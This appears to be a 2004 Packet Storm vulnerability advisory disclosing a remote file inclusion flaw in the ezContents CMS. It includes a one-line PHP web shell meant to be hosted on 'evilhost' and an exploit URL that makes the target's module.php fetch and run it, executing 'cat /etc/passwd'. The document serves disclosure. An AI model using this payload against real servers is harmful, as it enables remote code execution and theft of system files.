ezcontents.txt

2004-01-11T00:00:00
ID PACKETSTORM:32499
Type packetstorm
Reporter Zero-X
Modified 2004-01-11T00:00:00

Description

                                        
                                            `  
  
Remote Code Execution in ezContents  
  
"ezContents" from www.ezcontents.org allows to execute code.  
  
Example:  
  
Create the following file on your webserver:  
  
----index.php----  
<?  
system($cmd);  
?>  
-----------------  
  
And then type in the following URL:  
  
http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd  
  
  
Zero X, member of www.lobnan.de and www.lostkey.org  
`